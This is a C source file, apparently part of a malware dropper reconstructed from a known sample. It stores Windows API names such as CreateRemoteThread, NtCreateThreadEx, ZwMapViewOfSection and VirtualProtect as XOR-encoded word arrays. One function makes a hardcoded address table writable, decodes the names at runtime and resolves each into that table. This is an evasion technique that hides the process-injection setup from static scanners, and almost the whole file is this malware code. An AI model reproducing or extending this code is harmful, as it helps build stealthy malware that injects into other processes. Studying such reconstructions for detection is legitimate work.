dropper_Encoding.c

1. #include "4. Encoding.h"
2. #include "9. AssemblyBlock2.h"
3. #include "A. EncodingAlgorithms.h"
4.  
5. #include "define.h"
6.  
7. const WORD ENCODED_lstrcmpiW[10] =
8. {
9.     0xAE7E, 0xAE61, 0xAE66, 0xAE60,
10.     0xAE71, 0xAE7F, 0xAE62, 0xAE7B,
11.     0xAE45, 0xAE12
12. };
13.  
14. const WORD ENCODED_VirtualQuery[13] =
15. {
16.     0xAE44, 0xAE7B, 0xAE60, 0xAE66,
17.     0xAE67, 0xAE73, 0xAE7E, 0xAE43,
18.     0xAE67, 0xAE77, 0xAE60, 0xAE6B,
19.     0xAE12
20. };
21.  
22. const WORD ENCODED_VirtualProtect[15] =
23. {
24.     0xAE44, 0xAE7B, 0xAE60, 0xAE66,
25.     0xAE67, 0xAE73, 0xAE7E, 0xAE42,
26.     0xAE60, 0xAE7D, 0xAE66, 0xAE77,
27.     0xAE71, 0xAE66, 0xAE12
28. };
29.  
30. const WORD ENCODED_GetProcAddress[15] =
31. {
32.     0xAE55, 0xAE77, 0xAE66, 0xAE42,
33.     0xAE60, 0xAE7D, 0xAE71, 0xAE53,
34.     0xAE76, 0xAE76, 0xAE60, 0xAE77,
35.     0xAE61, 0xAE61, 0xAE12
36. };
37.  
38. const WORD ENCODED_MapViewOfFile[14] =
39. {
40.     0xAE5F, 0xAE73, 0xAE62, 0xAE44,
41.     0xAE7B, 0xAE77, 0xAE65, 0xAE5D,
42.     0xAE74, 0xAE54, 0xAE7B, 0xAE7E,
43.     0xAE77, 0xAE12
44. };
45.  
46. const WORD ENCODED_UnmapViewOfFile[16] =
47. {
48.     0xAE47, 0xAE7C, 0xAE7F, 0xAE73,
49.     0xAE62, 0xAE44, 0xAE7B, 0xAE77,
50.     0xAE65, 0xAE5D, 0xAE74, 0xAE54,
51.     0xAE7B, 0xAE7E, 0xAE77, 0xAE12
52. };
53.  
54. const WORD ENCODED_FlushInstructionCache[22] =
55. {
56.     0xAE54, 0xAE7E, 0xAE67, 0xAE61,
57.     0xAE7A, 0xAE5B, 0xAE7C, 0xAE61,
58.     0xAE66, 0xAE60, 0xAE67, 0xAE71,
59.     0xAE66, 0xAE7B, 0xAE7D, 0xAE7C,
60.     0xAE51, 0xAE73, 0xAE71, 0xAE7A,
61.     0xAE77, 0xAE12
62. };
63.  
64. const WORD ENCODED_LoadLibraryW[13] =
65. {
66.     0xAE5E, 0xAE7D, 0xAE73, 0xAE76,
67.     0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
68.     0xAE73, 0xAE60, 0xAE6B, 0xAE45,
69.     0xAE12
70. };
71.  
72. const WORD ENCODED_FreeLibrary[12] =
73. {
74.     0xAE54, 0xAE60, 0xAE77, 0xAE77,
75.     0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
76.     0xAE73, 0xAE60, 0xAE6B, 0xAE12
77. };
78.  
79. const WORD ENCODED_ZwCreateSection[16] =
80. {
81.     0xAE48, 0xAE65, 0xAE51, 0xAE60,
82.     0xAE77, 0xAE73, 0xAE66, 0xAE77,
83.     0xAE41, 0xAE77, 0xAE71, 0xAE66,
84.     0xAE7B, 0xAE7D, 0xAE7C, 0xAE12
85. };
86.  
87. const WORD ENCODED_ZwMapViewOfSection[19] =
88. {
89.     0xAE48, 0xAE65, 0xAE5F, 0xAE73,
90.     0xAE62, 0xAE44, 0xAE7B, 0xAE77,
91.     0xAE65, 0xAE5D, 0xAE74, 0xAE41,
92.     0xAE77, 0xAE71, 0xAE66, 0xAE7B,
93.     0xAE7D, 0xAE7C, 0xAE12
94. };
95.  
96. const WORD ENCODED_CreateThread[13] =
97. {
98.     0xAE51, 0xAE60, 0xAE77, 0xAE73,
99.     0xAE66, 0xAE77, 0xAE46, 0xAE7A,
100.     0xAE60, 0xAE77, 0xAE73, 0xAE76,
101.     0xAE12
102. };
103.  
104. const WORD ENCODED_WaitForSingleObject[20] =
105. {
106.     0xAE45, 0xAE73, 0xAE7B, 0xAE66,
107.     0xAE54, 0xAE7D, 0xAE60, 0xAE41,
108.     0xAE7B, 0xAE7C, 0xAE75, 0xAE7E,
109.     0xAE77, 0xAE5D, 0xAE70, 0xAE78,
110.     0xAE77, 0xAE71, 0xAE66, 0xAE12
111. };
112.  
113. const WORD ENCODED_GetExitCodeThread[18] =
114. {
115.     0xAE55, 0xAE77, 0xAE66, 0xAE57,
116.     0xAE6A, 0xAE7B, 0xAE66, 0xAE51,
117.     0xAE7D, 0xAE76, 0xAE77, 0xAE46,
118.     0xAE7A, 0xAE60, 0xAE77, 0xAE73,
119.     0xAE76, 0xAE12
120. };
121.  
122. const WORD ENCODED_ZwClose[8] =
123. {
124.     0xAE48, 0xAE65, 0xAE51, 0xAE7E,
125.     0xAE7D, 0xAE61, 0xAE77, 0xAE12
126. };
127.  
128. const WORD ENCODED_CreateRemoteThread[19] =
129. {
130.     0xAE51, 0xAE60, 0xAE77, 0xAE73,
131.     0xAE66, 0xAE77, 0xAE40, 0xAE77,
132.     0xAE7F, 0xAE7D, 0xAE66, 0xAE77,
133.     0xAE46, 0xAE7A, 0xAE60, 0xAE77,
134.     0xAE73, 0xAE76, 0xAE12
135. };
136.  
137. const WORD ENCODED_NtCreateThreadEx[17] =
138. {
139.     0xAE5C, 0xAE66, 0xAE51, 0xAE60,
140.     0xAE77, 0xAE73, 0xAE66, 0xAE77,
141.     0xAE46, 0xAE7A, 0xAE60, 0xAE77,
142.     0xAE73, 0xAE76, 0xAE57, 0xAE6A,
143.     0xAE12
144. };
145.  
146. // 100% (C) CODE MATCH
147. BOOL DecodeEncryptedModuleNames()
148. {
149.     DWORD dwOld;
150.    
151.     if(!VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_WRITECOPY, &dwOld) &&
152.        !VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_READWRITE, &dwOld))
153.         return FALSE;
154.    
155.     *(HMODULE*)_F(NTDLL_DLL) = GetModuleNTDLL();
156.    
157.     *(DWORD*)_F(lstrcmpiW            ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_lstrcmpiW);
158.     *(DWORD*)_F(VirtualQuery         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualQuery);
159.     *(DWORD*)_F(VirtualProtect       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualProtect);
160.     *(DWORD*)_F(GetProcAddress       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetProcAddress);
161.     *(DWORD*)_F(MapViewOfFile        ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_MapViewOfFile);
162.     *(DWORD*)_F(UnmapViewOfFile      ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_UnmapViewOfFile);
163.     *(DWORD*)_F(FlushInstructionCache) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FlushInstructionCache);
164.     *(DWORD*)_F(LoadLibraryW         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_LoadLibraryW);
165.     *(DWORD*)_F(FreeLibrary          ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FreeLibrary);
166.     *(DWORD*)_F(ZwCreateSection      ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwCreateSection);
167.     *(DWORD*)_F(ZwMapViewOfSection   ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwMapViewOfSection);
168.     *(DWORD*)_F(CreateThread         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_CreateThread);
169.     *(DWORD*)_F(WaitForSingleObject  ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_WaitForSingleObject);
170.     *(DWORD*)_F(GetExitCodeThread    ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetExitCodeThread);
171.     *(DWORD*)_F(ZwClose              ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwClose);
172.    
173.     return TRUE;
174. }